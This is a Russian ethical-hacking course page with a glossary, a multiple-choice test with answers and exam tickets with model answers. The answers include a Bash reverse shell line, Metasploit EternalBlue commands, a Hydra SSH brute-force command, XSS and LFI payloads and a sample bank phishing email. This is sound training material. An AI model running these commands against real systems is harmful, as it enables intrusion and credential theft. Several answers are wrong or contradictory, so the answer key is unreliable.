Этичный хакер (Профессиональный уровень)
Научитесь выявлять уязвимости в информационных системах, защищать данные и обеспечивать кибербезопасность на высоком уровне. Курс направлен на подготовку специалистов по информационной безопасности, способных применять свои навыки этично и в рамках закона. Вы освоите современные методики тестирования на проникновение, научитесь использовать профессиональные инструменты и анализировать угрозы. Практико-ориентированная программа поможет вам стать востребованным специалистом в сфере кибербезопасности.
Содержание:
-
Введение в профессию:
Что такое этичный хакинг, роль специалиста в обеспечении информационной безопасности, правовые аспекты, основные направления деятельности. -
Типы угроз и атак:
Виды киберугроз, классификация атак, методология анализа рисков, работа с уязвимостями. -
Инструменты этичного хакера:
Использование Kali Linux, Wireshark, Metasploit, Nmap и других профессиональных средств для тестирования безопасности. -
Тестирование на проникновение (Penetration Testing):
Методы сканирования сетей, перехвата данных, эксплуатации уязвимостей, отчетность по результатам тестирования. -
Сетевая безопасность:
Анализ протоколов TCP/IP, защита сетевых устройств, обнаружение несанкционированного доступа. -
Web-безопасность:
Тестирование безопасности веб-приложений, защита от SQL-инъекций, XSS-атак, CSRF и других угроз. -
Криптография и защита данных:
Основы шифрования, использование алгоритмов, защита конфиденциальной информации. -
Анализ инцидентов и реагирование на угрозы:
Обнаружение атак, расследование инцидентов, восстановление систем, предотвращение повторных атак. -
Саморазвитие и карьера:
Построение карьеры специалиста по кибербезопасности, сертификация (CEH, OSCP и др.), развитие в области этичного хакинга.
Должен знать:
— Основы сетевых технологий и операционных систем. — Принципы работы протоколов TCP/IP, DNS, HTTP(S), FTP и др. — Методы тестирования безопасности и стандарты отчётности. — Основы криптографии и защиты данных. — Правовые нормы и этические принципы при проведении тестов на проникновение.
Должен уметь:
— Проводить аудит безопасности информационных систем. — Использовать профессиональные инструменты для поиска уязвимостей. — Выполнять тестирование на проникновение в различных средах (сети, веб-приложения, серверы). — Анализировать логи и выявлять подозрительную активность. — Грамотно оформлять отчеты о найденных уязвимостях и предлагать пути их устранения.
Дополнительные элементы:
- Практические задания с обратной связью.
- Лабораторные стенды и симуляции реальных атак.
- Сертификат о прохождении курса.
- Поддержка в создании портфолио проектов по тестированию безопасности.
-
Что такое этичный хакинг?
Это законное тестирование систем на уязвимости с разрешения владельца для повышения уровня безопасности. -
Какие этапы включает пентест?
Перечисление целей, сбор информации, сканирование, получение доступа, повышение привилегий, сохранение доступа, очистка следов. -
Что означает «рекогносцировка» в контексте этичного хакинга?
Это процесс сбора информации о цели до начала атаки. -
Чем отличается активный сбор информации от пассивного?
Активный сбор данных напрямую взаимодействует с целью и может быть обнаружен, в то время как пассивный сбор использует открытые источники. -
Какой инструмент часто используется для сканирования портов?
Nmap. -
Что такое фингерпринтинг ОС?
Метод определения операционной системы удалённого устройства путём анализа сетевых характеристик. -
Что такое banner grabbing?
Получение информации о запущенных сервисах путем считывания баннеров при подключении к порту. -
Для чего используется утилита Metasploit?
Для эксплуатации уязвимостей, создания шелл-кода, тестирования и автоматизации атак. -
Как работает ARP-спуфинг?
Атакующий подменяет свой MAC-адрес на адрес шлюза или жертвы, перехватывая трафик. -
Что такое MITM-атака?
Атака типа «человек посередине», при которой злоумышленник перехватывает и/или модифицирует коммуникацию между двумя сторонами. -
Как защититься от MITM-атак?
Используйте шифрование (например, HTTPS), избегайте небезопасных сетей Wi-Fi, применяйте WPA2/WPA3. -
Что такое SQL-инъекция?
Атака, при которой злоумышленник внедряет вредоносный SQL-запрос через поля ввода на сайте для получения или изменения данных БД. -
Как предотвратить SQL-инъекции?
Используйте параметризованные запросы, экранируйте входные данные, проводите валидацию и регулярное тестирование. -
Что такое XSS?
Межсайтовый скриптинг — это атака, позволяющая внедрять вредоносный код на веб-страницу, который выполняется браузером пользователя. -
Какие типы XSS существуют?
Хранимый (stored), отражённый (reflected), основанный на DOM. -
Что такое CSRF?
Подделка межсайтовых запросов — это атака, которая заставляет пользователя выполнять действия на сайте без его ведома. -
Как защититься от CSRF?
Используйте анти-CSRF-токены, проверку Referer-заголовка, SameSite-атрибуты cookie. -
Что такое LFI и RFI?
LFI — локальное включение файлов, RFI — удалённое включение файлов; оба метода используются для выполнения произвольного кода. -
Какие методы используются для обхода ограничений безопасности в веб-приложениях?
Изменение заголовков, использование прокси, подмена файлов cookie, манипуляции с параметрами URL. -
Что такое fuzzing?
Тестирование программ путем передачи случайных или некорректных данных для поиска уязвимостей. -
Какие инструменты используются для веб-сканирования?
Burp Suite, OWASP ZAP, Nikto, Acunetix. -
Что такое уязвимость типа «переполнение буфера»?
Переполнение буфера — это когда программа записывает в буфер больше данных, чем он может вместить, что может привести к выполнению произвольного кода. -
Какие шаги входят в фазу перечисления при пентесте?
Поиск пользователей, групп, общих ресурсов, служб, политик безопасности. -
Что такое DNS spoofing?
Подмена DNS-записей с целью перенаправления пользователя на вредоносный сайт. -
Как работает DDoS-атака?
Цель состоит в том, чтобы завалить цель большим количеством запросов и сделать её недоступной для легитимных пользователей. -
Какие виды DDoS-атак существуют?
Объёмные, протокольные, атаки на уровне приложений. -
Что такое social engineering?
Манипуляции с людьми с целью получения конфиденциальной информации или доступа к системам. -
Какие методы социальной инженерии наиболее распространены?
Фишинг, претекстинг, подстрекательство, подкуп, услуга за услугу. -
Что такое phishing?
Вид мошенничества, при котором жертве отправляют сообщения, выдаваемые за сообщения от надёжных источников, с целью получения логина, пароля или финансовых данных. -
Что такое vishing?
Мошенничество по телефону, при котором злоумышленник выдает себя за сотрудника организации. -
Что такое malware?
Вредоносное программное обеспечение, предназначенное для нанесения вреда системе или кражи данных. -
Какие типы malware существуют?
Вирусы, черви, трояны, программы-вымогатели, шпионское ПО, рекламное ПО, руткиты. -
Что такое ransomware?
Вредоносная программа, блокирующая доступ к системе или данным до выплаты выкупа. -
Как работает вирус?
Прикрепляется к исполняемому файлу и активируется при его запуске, после чего может распространяться самостоятельно. -
Что такое червь (worm)?
Самораспространяющаяся вредоносная программа, не требующая привязки к другим файлам. -
Что такое rootkit?
Комплекс программ, позволяющих получить привилегированный доступ к системе и скрыть своё присутствие. -
Что такое honeypot?
Ловушка, имитирующая уязвимую систему для привлечения и анализа действий злоумышленников. -
Какие функции выполняет IDS?
Обнаруживает подозрительную активность в сети или системе, но не блокирует её автоматически. -
Чем отличается IDS от IPS?
IDS только обнаруживает угрозы, тогда как IPS может их блокировать. -
Что такое брандмауэр и как он работает?
Система контроля сетевого трафика, основанная на правилах фильтрации. -
Какие виды файрволов существуют?
Пакетные фильтры, проверка состояния, шлюзы на уровне приложений. -
Что такое SIEM?
Система управления информацией и событиями безопасности, собирающая и анализирующая логи. -
Что такое логический анализ и зачем он нужен?
Анализ журналов событий для выявления аномалий и потенциальных атак. -
Какие основные протоколы используются в беспроводных сетях?
WEP, WPA, WPA2, WPA3. -
Какие уязвимости есть у WEP?
Слабый алгоритм шифрования, уязвимость к атакам повторного воспроизведения. -
Как защититься от прослушивания беспроводного трафика?
Использовать современные протоколы шифрования, менять ключи, отключать WPS. -
Что такое honeynet?
Сеть из нескольких «приманных сетей», созданная для изучения сложных атак. -
Что такое threat modeling?
Процесс выявления потенциальных угроз и разработки мер защиты. -
Что такое vulnerability assessment?
Систематический поиск уязвимостей в системах и приложениях. -
Что такое penetration testing?
Активное тестирование системы с попыткой проникновения для выявления реальных уязвимостей. -
Какие документы обычно предоставляются после пентеста?
Отчет с описанием найденных уязвимостей, рекомендациями, доказательствами и оценкой рисков. -
Что такое CVE?
Единая система идентификации известных уязвимостей. -
Что такое CVSS?
Система оценки критичности уязвимостей по шкале от 0 до 10. -
Что такое exploit?
Программа или набор команд, используемых для эксплуатации уязвимости. -
Что такое payload?
Часть эксплойта, которая выполняет полезную нагрузку, например, открывает обратный шелл. -
Что такое reverse shell?
Соединение, при котором атакуемая система инициирует подключение к атакующему. -
Что такое bind shell?
Оболочка, которая запускается на целевой машине и ожидает подключения извне. -
Какие метасимволы часто используются при LFI?
../, /etc/passwd, ../../../../etc/shadow. -
Что такое steganography?
Метод сокрытия информации внутри других файлов, таких как изображения или звук. -
Что такое cryptography?
Наука о методах шифрования и дешифровки информации. -
Чем отличается симметричное шифрование от асимметричного?
В симметричном шифровании используется один ключ, в асимметричном — пара ключей: открытый и закрытый. -
Что такое хэш-функция?
Алгоритм, преобразующий данные в уникальную строку фиксированной длины. -
Какие алгоритмы хеширования считаются безопасными?
SHA-256, SHA-3, bcrypt, Argon2. -
Что такое двухфакторная аутентификация (2FA)?
Дополнительный уровень безопасности, требующий двух способов подтверждения личности. -
Какие протоколы используются для безопасного удалённого доступа?
SSH, TLS, SSL, IPsec. -
Что такое zero-day vulnerability?
Уязвимость, о которой разработчики ещё не знают и для которой нет патча. -
Что такое OSINT?
Сбор информации из открытых источников для проведения разведки. -
Какие инструменты используются в OSINT?
TheHarvester, Maltego, Shodan, Google Dorks. -
Что такое RAT?
Удаленный административный троян, позволяющий полностью контролировать систему. -
Что такое privilege escalation?
Получение более высоких прав в системе, чем предусмотрено текущей учётной записью. -
Что такое lateral movement?
Перемещение по внутренней сети после первоначального проникновения. -
Что такое persistence?
Методы, позволяющие злоумышленнику сохранять доступ к системе даже после перезагрузки. -
Какие средства используются для анализа вредоносного ПО?
Cuckoo Sandbox, ANY.RUN, IDA Pro, Ghidra. -
Что такое incident response?
Процесс реагирования на инциденты, связанные с безопасностью, с целью минимизации ущерба. -
Какие этапы включает incident response?
Подготовка, выявление, анализ, сдерживание, устранение, восстановление, анализ после инцидента.
- Что такое этичный хакинг?
A) Незаконный взлом системы
B) Тестирование безопасности с разрешения владельца
C) Удаление антивирусного ПО
D) Создание вредоносных программ
Ответ: B
- Кто из перечисленных специалистов может быть классифицирован как «белый хакер»?
A) Хакер, взламывающий системы ради прибыли
B) Специалист по защите информации в компании
C) Преступник, использующий методы социальной инженерии
D) Взломщик, распространяющий данные в интернете
Ответ: B
- Как называется процесс поиска уязвимостей в системе без фактического взлома?
A) Атака методом подбора
B) Тестирование на проникновение
C) Периметральная защита
D) Социальная инженерия
Ответ: B
- Какой тип атаки направлен на получение конфиденциальной информации путем обмана пользователя?
A) SQL-инъекция
B) Фишинг
C) DDoS
D) XSS
Ответ: B
- Что означает термин «отпечаток»?
A) Сокрытие следов взлома
B) Поиск информации о целевой системе
C) Шифрование данных
D) Отправка спама
Ответ: B
- Какой протокол используется для безопасной передачи данных в веб-браузерах?
A) HTTP
B) FTP
C) HTTPS
D) Telnet
Ответ: C
- Как называется метод атаки, при котором злоумышленник внедряет вредоносный скрипт на веб-страницу?
A) SQLi
B) XSS
C) CSRF
D) Переполнение буфера
Ответ: B
- Какой инструмент используется для анализа сетевого трафика?
A) Nmap
B) Wireshark
C) Metasploit
D) John the Ripper
Ответ: B
- Какой тип атаки основан на переполнении буфера памяти?
A) XSS
B) SQLi
C) Переполнение буфера
D) Фишинг
Ответ: C
- Что означает аббревиатура IDS?
A) Индекс динамических систем
B) Система обнаружения вторжений
C) Инструмент диагностики сети
D) Интерфейс цифровой подписи
Ответ: B -
Какой инструмент используется для сканирования открытых портов?
A) Wireshark
B) Nmap
C) SQLMap
D) Hydra
Ответ: B -
Что такое «полезная нагрузка» в контексте этичного хакинга?
A) Защитный код
B) Данные, передаваемые в рамках атаки
C) Журнал системы
D) Пароль администратора
Ответ: B -
Какой тип межсетевого экрана проверяет заголовки пакетов?
A) Статический
B) Прикладной
C) Пакетный фильтр
D) Прокси-сервер
Ответ: C -
Как называется атака, при которой злоумышленник подменяет MAC-адрес?
A) Подмена ARP-адреса
B) Подмена DNS-адреса
C) Подмена IP-адреса
D) Перехват сеанса
Ответ: A -
Какой из перечисленных методов используется для взлома паролей?
A) Социальная инженерия
B) Фишинг
C) Перебор (brute force)
D) Все перечисленные
Ответ: D -
Какой протокол уязвим для атак типа «человек посередине»?
A) HTTPS
B) SSH
C) HTTP
D) FTPS
Ответ: C -
Что означает термин «эксплойт»?
A) Обнаружение уязвимости
B) Использование уязвимости для атаки
C) Установка антивируса
D) Восстановление данных
Ответ: B -
Какой уровень модели OSI отвечает за маршрутизацию данных?
A) Транспортный
B) Сетевой
C) Канальный
D) Сеансовый
Ответ: B -
Как называется программа, которая маскируется под полезное ПО, но содержит вредоносный код?
A) Червь
B) Троян
C) Вирус
D) Руткит
Ответ: B -
Какой тип атаки направлен на перегрузку сервера запросами?
A) XSS
B) SQLi
C) DDoS
D) CSRF
Ответ: C -
Какой из этих файлов может содержать информацию о структуре сайта?
A) .bash_history
B) .htaccess
C) robots.txt
D) index.php
Ответ: C -
Что такое «хеш» в контексте безопасности?
A) Зашифрованный пароль
B) Функция преобразования данных в уникальную строку
C) Сессионный ключ
D) Имя пользователя
Ответ: B -
Какой алгоритм не является хэш-функцией?
A) MD5
B) SHA-1
C) AES
D) SHA-256
Ответ: C -
Какой тип аутентификации использует одноразовые пароли?
A) TOTP
B) LDAP
C) RADIUS
D) Kerberos
Ответ: A -
Какой из этих инструментов используется для взлома хэшей?
A) Metasploit
B) John the Ripper
C) Wireshark
D) Burp Suite
Ответ: B -
Что такое «приманка»?
A) Система обнаружения вторжений
B) Ложная система для привлечения атакующих
C) Антивирусная программа
D) Межсетевой экран
Ответ: B -
Какой тип шифрования использует один и тот же ключ для шифрования и расшифровки?
A) Асимметричное
B) Гибридное
C) Симметричное
D) Хеширование
Ответ: C -
Какой протокол используется для безопасного удаленного доступа?
A) Telnet
B) FTP
C) SSH
D) HTTP
Ответ: C -
Какой из этих стандартов относится к беспроводной безопасности?
A) WPA2
B) TCP/IP
C) SSL
D) ICMP
Ответ: A -
Какая команда используется для трассировки маршрута?
A) ping
B) ipconfig
C) tracert
D) netstat
Ответ: C -
Какой тип вредоносного ПО блокирует доступ к данным до выплаты выкупа?
A) Троян
B) Программа-вымогатель (ransomware)
C) Червь
D) Руткит
Ответ: B -
Какой из этих подходов используется для защиты от XSS?
A) Использование HTTPS
B) Санкционирование ввода
C) Отключение JavaScript
D) Все вышеперечисленное
Ответ: D -
Что означает «CVE»?
A) Центральные венозные данные
B) Распространенные уязвимости и ошибки
C) Вектор оценки уязвимостей
D) Комплексное окружение версий
Ответ: B -
Какой из этих протоколов небезопасен для передачи паролей?
A) HTTPS
B) FTP
C) SSH
D) SFTP
Ответ: B -
Какой инструмент используется для автоматизации атак на веб-приложения?
A) Nmap
B) Burp Suite
C) Wireshark
D) Netcat
Ответ: B -
Какой тип атаки позволяет внедрять SQL-запросы через форму ввода?
A) XSS
B) CSRF
C) SQLi
D) Переполнение буфера
Ответ: C -
Какой из этих методов помогает защититься от SQLi?
A) Использование динамических SQL-запросов
B) Использование подготовленных выражений
C) Отключение базы данных
D) Удаление всех форм ввода
Ответ: B -
Какой протокол обеспечивает шифрование на уровне электронной почты?
A) POP3
B) IMAP
C) SMTP
D) STARTTLS
Ответ: D -
Какой из следующих элементов чаще всего используется для атаки на мобильные устройства?
A) Поддельные точки доступа Wi-Fi
B) SMS-сообщения с вредоносными ссылками
C) Защищённые приложения
D) Блокировка экрана
Ответ: B -
Какой из перечисленных методов используется для анализа трафика в реальном времени?
A) Nmap
B) Wireshark
C) Nessus
D) Aircrack-ng
Ответ: B -
Какой из этих инструментов предназначен для тестирования беспроводных сетей?
A) Ettercap
B) Aircrack-ng
C) Nikto
D) Metasploit
Ответ: B -
Какой из следующих документов должен быть подписан перед началом тестирования на проникновение?
A) Политика безопасности
B) Договор аренды
C) Соглашение о конфиденциальности
D) Согласие на проведение теста
Ответ: D -
Какой из следующих этапов НЕ входит в жизненный цикл этичного хакинга?
A) Сбор информации
B) Анализ финансовой отчетности
C) Получение доступа
D) Устранение уязвимостей
Ответ: B -
Какой из этих методов используется для маскировки активности хакера?
A) Удаление логов
B) Открытие новых портов
C) Запуск брандмауэра
D) Установка антивируса
Ответ: A -
Какой из перечисленных инструментов используется для анализа уязвимостей?
A) Metasploit
B) Nessus
C) Hydra
D) SQLMap
Ответ: B -
Какой из следующих терминов описывает процесс получения информации путем наблюдения за жертвой?
A) Фишинг
B) Сниффинг
C) Оверхед
D) Наблюдение через плечо
Ответ: D -
Какой из следующих факторов может быть частью двухфакторной аутентификации?
A) Пароль
B) Отпечаток пальца
C) Имя пользователя
D) IP-адрес
Ответ: B -
Какой из следующих методов используется для атаки на API?
A) XSS
B) SQLi
C) Небезопасные прямые ссылки на объекты
D) Все перечисленные
Ответ: D -
Какой из следующих протоколов используется для шифрования трафика между клиентом и сервером?
A) TLS
B) HTTP
C) FTP
D) DHCP
Ответ: A -
Какой из следующих методов используется для обхода ограничений ввода в веб-формах?
A) URL-кодирование
B) Base64-кодирование
C) Изменение HTML
D) Все перечисленные
Ответ: D -
Какой из следующих типов тестирования проводится без предварительного ознакомления с системой?
A) Серое тестирование
B) Чёрное тестирование
C) Белое тестирование
D) Прозрачное тестирование
Ответ: B -
Какой из следующих типов тестирования проводится с полным доступом к информации о системе?
A) Белое тестирование
B) Чёрное тестирование
C) Серое тестирование
D) Слепое тестирование
Ответ: A -
Какой из следующих инструментов используется для создания обратных соединений?
A) Netcat
B) Wireshark
C) Nmap
D) Burp Suite
Ответ: A -
Какой из следующих протоколов используется для передачи файлов?
A) TCP
B) UDP
C) FTP
D) ICMP
Ответ: C -
Какой из следующих методов используется для анализа слабых паролей в сети?
A) Hydra
B) John the Ripper
C) Hashcat
D) Все перечисленные
Ответ: D -
Какой из следующих методов используется для перехвата трафика в локальной сети?
A) Подмена ARP
B) Подмена DNS
C) Подмена IP
D) Все вышеперечисленные
Ответ: D -
Какой из следующих инструментов используется для тестирования безопасности веб-приложений?
A) OWASP ZAP
B) Metasploit
C) Wireshark
D) Nmap
Ответ: A -
Какой из перечисленных принципов относится к основам информационной безопасности?
A) Конфиденциальность
B) Доступность
C) Целостность
D) Все перечисленные
Ответ: D -
Какой из следующих методов используется для обхода файрвола?
A) Использование DNS-туннелирования
B) Шифрование трафика
C) Подмена IP-адреса
D) Все вышеперечисленное
Ответ: D -
Какой из следующих типов атак использует поддельный веб-сайт для сбора учётных данных?
A) XSS
B) Фишинг
C) SQLi
D) CSRF
Ответ: B -
Какой из следующих инструментов используется для анализа безопасности баз данных?
A) SQLMap
B) Metasploit
C) Hydra
D) Nmap
Ответ: A -
Какой из следующих протоколов используется для синхронизации времени?
A) SNMP
B) NTP
C) DHCP
D) SMTP
Ответ: B -
Какой из следующих методов используется для атаки на доменные серверы?
A) Подмена DNS
B) Перехват DNS
C) Отравление DNS
D) Все перечисленные
Ответ: D -
Какой из перечисленных ниже инструментов используется для перехвата и воспроизведения сетевого трафика?
A) Wireshark
B) tcpdump
C) Ettercap
D) Все перечисленные
Ответ: D -
Какой из следующих методов используется для защиты от CSRF-атак?
A) Проверка заголовка Referer
B) Использование токенов
C) Ограничение методов HTTP
D) Все вышеперечисленные
Ответ: D -
Какой из следующих терминов описывает использование легитимных инструментов в злонамеренных целях?
A) Бесфайловое вредоносное ПО
B) Жить за счёт природы
C) Нулевой день
D) Руткит
Ответ: B -
Какой из следующих методов используется для определения операционной системы удаленного хоста?
A) Активный отпечаток
B) Пассивный отпечаток
C) Сканирование портов
D) Все вышеперечисленные
Ответ: D -
Какой из перечисленных ниже инструментов используется для анализа поведения вредоносного ПО?
A) VirusTotal
B) ANY.RUN
C) Cuckoo Sandbox
D) Все перечисленные
Ответ: D -
Какой из следующих методов используется для предотвращения утечки данных?
A) Шифрование
B) Контроль доступа
C) Аудит действий пользователей
D) Все вышеперечисленное
Ответ: D -
Какой из следующих протоколов уязвим для атак типа downgrade?
A) TLS 1.2
B) TLS 1.3
C) SSL 3.0
D) HTTPS
Ответ: C -
Какой из следующих методов используется для анализа уязвимостей в IoT-устройствах?
A) Анализ прошивки
B) Сканер портов
C) Анализ трафика
D) Все вышеперечисленные
Ответ: D -
Какой из следующих инструментов используется для работы с радиочастотами?
A) Wireshark
B) RTL-SDR
C) Nmap
D) Metasploit
Ответ: B -
Какой из следующих терминов описывает использование уязвимости, о которой разработчики ещё не знают?
A) Известная уязвимость
B) Исправленная уязвимость
C) Уязвимость нулевого дня
D) Открытый эксплойт
Ответ: C -
Какой из следующих методов используется для анализа защищенности облачных сред?
A) Проверка политик IAM
B) Анализ прав доступа
C) Аудит журналов
D) Все вышеперечисленное
Ответ: D -
Какой из перечисленных документов регулирует вопросы кибербезопасности в России?
A) ГОСТ Р 57580
B) Федеральный закон №149
C) ISO/IEC 27001
D) Все перечисленные
Ответ: D
Экзаменационный билет №1
Теоретическая часть
- Что такое этичный хакинг и чем он отличается от несанкционированного доступа?
- Перечислите основные этапы тестирования на проникновение.
Ответы:
- Этичный хакинг — это процесс поиска уязвимостей в информационных системах с разрешения владельца с целью их устранения и повышения уровня безопасности. В отличие от несанкционированного доступа, этичный хакинг проводится легально и с чётко определёнными целями.
- Основные этапы тестирования на проникновение :
- Сбор информации (разведка)
- Сканирование и анализ уязвимостей
- Получение доступа
- Эскалация привилегий
- Установление контроля / сохранение доступа
- Очистка следов взлома
- Формирование отчёта
Практическая часть
Выполните сканирование открытых портов на локальном тестовом хосте (например, scanme.nmap.org) с помощью инструмента Nmap. Запишите команду и кратко опишите полученные результаты.
Пример ответа:
Для сканирования используется команда:nmap -sT scanme.nmap.org
Результат:
Открыты порты 22 (SSH), 80 (HTTP), 443 (HTTPS).
Порт 22 закрыт, но фильтруется брандмауэром.
На порту 80 запущен веб-сервер Apache.
Экзаменационный билет №2
Теоретическая часть
- Что означает термин «отпечаток» в контексте тестирования безопасности?
- Какие инструменты используются на этапе разведки?
Ответы:
- Отпечаток — это процесс сбора информации о целевой системе до начала активного взаимодействия с ней. Цель — получить как можно больше данных об архитектуре, доменах, IP-адресах и возможных уязвимостях.
- Инструменты: Nmap, WHOIS, DNSenum, TheHarvester, Shodan, Recon-ng.
Практическая часть
С помощью командной строки проверьте доступность удалённого хоста (например, google.com). Укажите используемую команду и опишите результат.
Пример ответа:
Для проверки доступности используется команда ping google.com(
(Официальный сайт Google)
Результат: получено 4 ответа от сервера, среднее время задержки — 30 мс. Хост доступен.
Экзаменационный билет №3
Теоретическая часть
- Что такое DoS- и DDoS-атаки? Чем они отличаются?
- Какие методы защиты от DDoS-атак существуют?
Ответы:
- DoS (отказ в обслуживании) — атака, направленная на перегрузку ресурсов системы одним источником. DDoS — та же атака, но с использованием множества источников (ботнетов).
- Методы защиты: использование CDN, фильтрация трафика, установка WAF, масштабируемость ресурсов, DDoS-защита провайдера.
Практическая часть
Напишите пример простого скрипта на Python, который отправляет несколько TCP-запросов на указанный порт.
Пример ответа:
Используется библиотека socket для создания TCP-соединения. Например: создать сокет, подключиться к адресу и порту, вывести результат.
Экзаменационный билет №4
Теоретическая часть
- Что такое XSS-атака и какие её виды существуют?
- Как защититься от XSS?
Ответы:
- XSS (межсайтовый скриптинг) — внедрение вредоносного кода через поля ввода. Виды: отражённый, хранимый, DOM-базированный.
- Защита: экранирование входных данных, использование Content Security Policy (CSP), проверка пользовательского ввода.
Практическая часть
Напишите пример HTML-формы, подверженной XSS-атакам, и объясните, как злоумышленник может её использовать.
Пример ответа:
Форма принимает комментарий и сразу выводит его на страницу без фильтрации. Злоумышленник может отправить в поле ввода JavaScript-скрипт, например <script>alert('XSS')</script>
, что приведёт к его выполнению в браузере других пользователей.
Экзаменационный билет №5
Теоретическая часть
- Что такое SQL-инъекции и как они работают?
- Перечислите основные методы защиты от SQLi.
Ответы:
- SQL-инъекция — внедрение SQL-кода через поля ввода для изменения логики запроса к БД.
- Защита: подготовленные запросы (PDO), фильтрация ввода, использование ORM, ограничение прав пользователя БД.
Практическая часть
Приведите пример SQL-запроса, уязвимого для внедрения, и улучшенную версию с защитой.
Пример ответа:
Уязвимый запрос: SELECT * FROM users WHERE login = 'логин' AND password = 'пароль'
Защищённый вариант: использование подготовленных запросов с параметрами, например, в PHP через PDO.
Экзаменационный билет №6
Теоретическая часть
- Что такое MITM-атака и как она реализуется?
- Как предотвратить MITM?
Ответы:
- MITM (атака «человек посередине») — прослушивание или изменение трафика между двумя сторонами без их ведома.
- Предотвращение: использование HTTPS, шифрование трафика, проверка сертификатов, WPA2/WPA3 для Wi-Fi.
Практическая часть
Как проверить, используется ли HTTPS при подключении к сайту, с помощью браузера и командной строки?
Пример ответа:
В браузере: значок замка в адресной строке.
В командной строке: выполнить curl -I https://example.com
и проверить статус ответа.
Экзаменационный билет №7
Теоретическая часть
- Что такое брутфорс и как он работает?
- Как защититься от брутфорса?
Ответы:
- Брутфорс — метод подбора паролей путём перебора всех возможных комбинаций.
- Защита: ограничение количества попыток входа, двухфакторная аутентификация, сложные пароли, CAPTCHA.
Практическая часть
Напишите команду Hydra для подбора логина и пароля к SSH-серверу.
Пример ответа:
hydra -l admin -P passwords.txt ssh://192.168.1.10
Экзаменационный билет №8
Теоретическая часть
- Что такое сетевой сниффинг и как он используется в этичном хакинге?
- Назовите популярные снифферы.
Ответы:
- Сниффинг — перехват и анализ сетевого трафика. Используется для диагностики и анализа безопасности.
- Снифферы: Wireshark, tcpdump, Ettercap, TShark.
Практическая часть
Напишите команду для запуска tcpdump и сохранения трафика в файл.
Пример ответа:
sudo tcpdump -i eth0 -w traffic.pcap
Экзаменационный билет №9
Теоретическая часть
- Что такое метасплоит и для чего он используется?
- Назовите три типа эксплойтов в Metasploit Framework.
Ответы:
- Metasploit — платформа для разработки, тестирования и использования эксплойтов.
- Типы: локальные эксплойты, удалённые эксплойты, эксплойты на стороне клиента.
Практическая часть
Опишите шаги по запуску эксплойта в Metasploit.
Пример ответа:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit
Экзаменационный билет №10
Теоретическая часть
- Что такое виртуализация и как она помогает этичному хакеру?
- Назовите три популярных гипервизора.
Ответы:
- Виртуализация — создание изолированной среды для тестирования атак и эксплойтов. Позволяет безопасно исследовать уязвимости.
- Гипервизоры: VMware, VirtualBox, KVM.
Практическая часть
Как проверить, запущена ли виртуальная машина в VirtualBox?
Пример ответа:
VBoxManage list runningvms
— если есть записи, значит, виртуальные машины запущены.
Экзаменационный билет №11
Теоретическая часть
- Что такое обратный shell и как он используется?
- Как защититься от reverse shell?
Ответы:
- Обратный шелл — соединение, при котором жертва сама устанавливает соединение с атакующим.
- Защита: файрволы, IDS, антивирусы, контроль исходящего трафика.
Практическая часть
Напишите пример reverse shell на Bash.
Пример ответа:
bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
Экзаменационный билет №12
Теоретическая часть
- Что такое уязвимость CVE и как интерпретировать номер CVE?
- Приведите пример известной уязвимости и её последствий.
Ответы:
- CVE (Common Vulnerabilities and Exposures) — уникальный идентификатор уязвимости. Формат: CVE-ГОД-XXXXX.
- Пример: CVE-2021-44228 (Log4Shell) — удалённое выполнение кода через уязвимость в библиотеке Log4j.
Практическая часть
Как найти информацию об уязвимости по номеру CVE?
Пример ответа:
Посетите сайт nvd.nist.gov
или cve.mitre.org
и введите номер CVE в поле поиска.
Экзаменационный билет №13
Теоретическая часть
- Что такое фишинг и как он реализуется?
- Как научить сотрудников распознавать фишинг?
Ответы:
- Фишинг — метод социальной инженерии, при котором мошенник выдаёт себя за доверенное лицо, чтобы украсть данные.
- Обучение: регулярные тренинги, рассылка тестовых фишинговых писем, внутренние инструкции.
Практическая часть
Создайте пример фишингового письма от имени банка.
Пример ответа:
Тема: Подтвердите свои данные для входа
Текст:
Уважаемый клиент, для обеспечения безопасности вашей учётной записи необходимо подтвердить данные. Нажмите здесь для подтверждения.
Экзаменационный билет №14
Теоретическая часть
- Что такое IDS и IPS? Чем они отличаются?
- Какие типы IDS существуют?
Ответы:
- IDS (система обнаружения вторжений) — система обнаружения вторжений; IPS (система предотвращения вторжений) — система предотвращения вторжений.
- Типы IDS: сетевые, хостовые, на основе сигнатур, на основе аномалий.
Практическая часть
Как проверить, установлен ли Snort в системе?
Пример ответа:
Выполнить snort --version
— если отобразится версия, значит, Snort установлен.
Экзаменационный билет №15
Теоретическая часть
- Что такое утечка данных и как её предотвратить?
- Какие меры технической защиты информации применяются?
Ответы:
- Утечка данных — несанкционированное раскрытие конфиденциальной информации. Предотвращается с помощью политик безопасности, шифрования, контроля доступа.
- Меры: шифрование дисков, DLP-системы, аудит доступа, обучение сотрудников.
Практическая часть
Как зашифровать USB-накопитель в Linux с помощью VeraCrypt?
Пример ответа:
Открыть VeraCrypt → Создать том → Зашифровать несистемный раздел/диск → выбрать USB-устройство и следовать инструкциям.
Случай 1: Уязвимый API-интерфейс
Описание ситуации
Вы — этичный хакер в команде по тестированию на проникновение. Вам поручили проверить безопасность мобильного приложения интернет-магазина. При анализе API вы обнаружили, что один из эндпоинтов не требует авторизации для получения данных пользователей, включая имя, номер телефона и адрес доставки.
Исходные данные
- Технологии: REST API, JSON
- Эндпоинт:
GET /api/v1/user/{id}
- Аутентификация: токен JWT
- Проблема: доступ к данным возможен без валидного токена
Анализ проблемы
Уязвимость позволяет злоумышленнику получить персональные данные пользователей, просто подставив ID в URL. Это нарушает принцип минимальных привилегий и может привести к утечке персональных данных.
Возможные причины уязвимости
- Отсутствие проверки подлинности на уровне сервера.
- Некорректная настройка middleware.
- Недостаточный контроль доступа к ресурсам.
Решение / рекомендации
- Добавить обязательную проверку JWT-токена перед доступом к любым персональным данным.
- Реализовать механизм проверки прав доступа (например, RBAC).
- Возвращать ошибку 401 или 403 при отсутствии токена или недостаточных правах.
- Логировать попытки несанкционированного доступа.
Пример исправленной логики
GET /api/v1/user/{id} Авторизация: предъявитель <действительный_токен>
Альтернативные меры безопасности
- Использование UUID вместо числовых ID.
- Ограничение количества запросов с одного IP-адреса.
- Шифрование конфиденциальных данных на стороне сервера.
Обучающие моменты
Что изучают студенты:
- Как обнаруживать уязвимости в API.
- Принципы защиты REST-сервисов.
- Работа с JWT и сессиями.
- Методы ограничения доступа к ресурсам.
Примечание
